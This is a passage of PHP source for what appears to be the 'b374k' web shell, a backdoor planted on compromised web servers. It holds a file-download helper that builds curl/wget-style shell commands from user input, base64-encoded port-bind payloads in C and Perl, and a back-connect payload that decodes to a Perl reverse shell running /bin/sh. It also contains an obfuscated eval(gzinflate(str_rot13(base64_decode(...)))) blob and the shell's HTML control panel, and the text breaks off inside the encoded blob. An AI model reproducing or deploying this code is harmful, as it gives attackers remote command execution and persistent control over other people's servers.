  615.         case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  616.         case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  617.         case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  618.         case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  619.         default: break; }
  620.     return $namafile;
  621.     }
  622.  
  623.     function get_perms($file)
  624.     {
  625.         if($mode=@fileperms($file))
  626.             {
  627.             $perms='';
  628.             $perms .= ($mode & 00400) ? 'r' : '-';
  629.             $perms .= ($mode & 00200) ? 'w' : '-';
  630.             $perms .= ($mode & 00100) ? 'x' : '-';
  631.             $perms .= ($mode & 00040) ? 'r' : '-';
  632.             $perms .= ($mode & 00020) ? 'w' : '-';
  633.             $perms .= ($mode & 00010) ? 'x' : '-';
  634.             $perms .= ($mode & 00004) ? 'r' : '-';
  635.             $perms .= ($mode & 00002) ? 'w' : '-';
  636.             $perms .= ($mode & 00001) ? 'x' : '-';
  637.             return $perms;
  638.             }
  639.         else return "??????????";
  640.     }
  641.  
  642.     function clearspace($text){ return str_replace(" ","_",$text); }
  643.  
  644.     $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  645.     $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  646.  
  647.     $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  648.     ?>
  649.  
  650. <html>
  651.     <head>
  652.         <link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAMIOAADCDgAAAAAAAAAAAAAMDg7/FBMS/xgWFf8UFBT/FxcY/x8dHv8aGRn/GhgY/xoZGP8RFBT/DRAR/xMTEv8WFBP/FRQU/w0NDv8SERH/EBER/xYVFP8bGBf/GhgX/xoZGP8fHh3/FhcY/xYXF/8bGhn/ERMT/xESEv8TEhH/Hxwb/yMhIP8MCwv/EhER/xMTFP8ZGBj/GxkY/xgYF/8bGxn/HBoY/xIUFP8NERP/FBYX/xATEf8UFRP/ExMR/yooJv8kJCP/EREQ/w8ODf8VFBT/GxkY/xwaGf8YGBb/FxgW/xcYE/8RExD/DA8L/xATAf8TFQ3/EREN/xEQDf83NTL/Li0s/w0ODv8MDAz/FRUU/xUVFf8aGRj/HBsZ/xsbF/8WGRT/ExcJ/wwOEf8PDW7/BAYK/xESCf9RUEz/U1JQ/x8eHf8NDAz/Dg8P/xMUFP8QEhP/FxgY/xsbGP8aGxf/HB0S/xITBP8wLIH/enXa/2dpaf97e3D/ZGVi/xwdGv8MDAr/EREQ/xEREf8WFxf/Gxsa/xkaGf8bGxj/HBwW/xcZC/8eHWP/j4rc/z08P/8hIQb/ExUF/wQGAP8AAAD/ERAN/xERD/8REhH/FRYW/xoaGv8ZGhn/GBkX/xocFf8KDAH/VlGw/3h1zP8AAAH/AAQA/wwNLf8OC1f/RkY6/w4PDP8RERD/EhIR/xETE/8UFhb/ERIR/xESEP8bHBT/AwYD/1ZTlP+IhNf/AAAD/wAAZP8AABT/uLX//4SEeP8AAAD/FRUT/xEREf8TFBT/FhYW/zM0M/8lJiT/BAYC/wIEAP8NDSH/wcDN/0lFrv9QS+r/v7zz/8/O2/8BAwD/DQ4K/xISEf8QERD/DxER/wYICP8JDQ7/RkZF/1VVUv8xMir/AAAA/1VWUf//////qqnQ/2Zoaf8GCAv/AgYA/xESD/8UFBP/ExMT/xobG/85Ozv/PD4+/zQ1Nf9SUlH/f357/6Sknv+Hh3//AAAO/wAAHv8AAwD/Cw0E/w8RDf8QEhD/FRUV/xYVFf8MDw//FxYW/yspKP84OTn/SUpJ/2VkYv/Ozcr/r66i/wAAJv8VFzX/Cw4B/xUVEv8ZFxT/FBQT/xMVFf8XFxf/DhAR/yclJf85Njb/RkZF/2BgYf9/fX3/ZGRi/xsaE/8TEiL/ExQ5/wwQB/8YFxT/GxgW/xYVFP8TExT/FxYX/xAREf8eHRz/KCUk/yUjIv8aGhn/DQ0M/wAAAP8JCwr/FxcV/xATFf8TFRL/GhkW/xwZF/8YFxb/FBMT/xQUE/8RERH/ExIS/xEPDv8MDQz/EhEQ/xUVE/8PERP/Cg0Q/xIUFP8RFBL/FhYV/xwaGf8aFxb/ExMT/xISEv8QDw//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D" type="image/x-icon" />
  653.         <title><?php print TITLE; ?> <?php echo VERSION; ?></title>
  654.         <script type="text/javascript">
  655.  
  656.         function tukar(lama,baru)
  657.             {
  658.             document.getElementById(lama).style.display = 'none';
  659.             document.getElementById(baru).style.display = 'block';
  660.             }
  661.  
  662.         </script>
  663.         <style type="text/css">
  664.             AKUSTYLE        { display:none; }
  665.             body            { background:#0F0E0E; }
  666.             A:link                  {COLOR: #2BA8EC; TEXT-DECORATION: none }
  667.             A:visited       {COLOR: #2BA8EC; TEXT-DECORATION: none }
  668.             A:hover         {text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan; color: #ff9900; TEXT-DECORATION: none }
  669.             A:active        {color: Red; TEXT-DECORATION: none }
  670.             textarea        {BORDER-RIGHT:  #3e3e3e 1px solid; BORDER-TOP:    #3e3e3e 1px solid; BORDER-LEFT:   #3e3e3e 1px solid; BORDER-BOTTOM: #3e3e3e 1px solid; BACKGROUND-COLOR: #1b1b1b; font: Fixedsys bold; color: #aaa; }
  671.             *           { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  672.             #menu           { background:#111111; margin:2px 2px 2px 2px; }
  673.             #menu a         { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  674.             #menu a:hover       { background:#744F4F; border-bottom:1px solid #333333; border-top:1px solid #333333; }
  675.             .tabnet         { margin:15px auto 0 auto; border: 1px solid #333333; }
  676.             .main           { width:100%; }
  677.             .gaya           { color: #4C83AF; }
  678.             .your_ip        { color: #FF4719; }
  679.             .inputz         { background:#796767; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  680.             .inputzbut      { background:#111111; color:#666666; margin:0 4px; border:1px solid #444444; }
  681.             .inputz:hover,
  682.             .inputzbut:hover    { border-bottom:1px solid #4532F6; border-top:1px solid #D4CECE; color:#D4CECE; }
  683.             .output         { margin:auto; border:1px solid #FF0000; width:100%; height:400px; background:#000000; padding:0 2px; }
  684.             .cmdbox         { width:100%; }
  685.             .head_info      { padding: 0 4px; }
  686.             .b1         { font-size:30px; padding:0; color:#FF0000; }
  687.             .b2         { font-size:30px; padding:0; color: #FF9966; }
  688.             .b_tbl          { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  689.             .phpinfo table      { width:100%; padding:0 0 0 0; }
  690.             .phpinfo td     { background:#111111; color:#cccccc; padding:6px 8px;; }
  691.             .phpinfo th, th     { background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
  692.             .phpinfo h2,
  693.             .phpinfo h2 a       { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  694.             .explore        { width:100%; }
  695.             .explore a      { text-decoration:none; }
  696.             .explore td     { border-bottom:1px solid #DB2B2B; padding:0 8px; line-height:24px; }
  697.             .explore th     { padding:3px 8px; font-weight:normal; }
  698.             .explore th:hover,
  699.             .phpinfo th:hover   { border-bottom:1px solid #4C83AF; }
  700.             .explore tr:hover   { background:#744F4F; }
  701.             .viewfile       { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
  702.             .sembunyi       { display:none; padding:0;margin:0; }
  703.         </style>
  704.     </head>
  705. <body onLoad="document.getElementById('cmd').focus();">
  706.     <div class="main">
  707.         <!-- head info start here -->
  708.         <div class="head_info">
  709.             <table>
  710.                 <tr>
  711.                     <td>
  712.                         <table class="b_tbl">
  713.                             <tr>
  714.                                 <td>
  715.                                 <a href="?">
  716.                                 <span class="b1">b<span class="b2">3<span class="b1">7</span>4</span>k</span>
  717.                                 </a>
  718.                                 </td>
  719.                             </tr>
  720.                             <tr>
  721.                             <? eval(gzinflate(str_rot13(base64_decode('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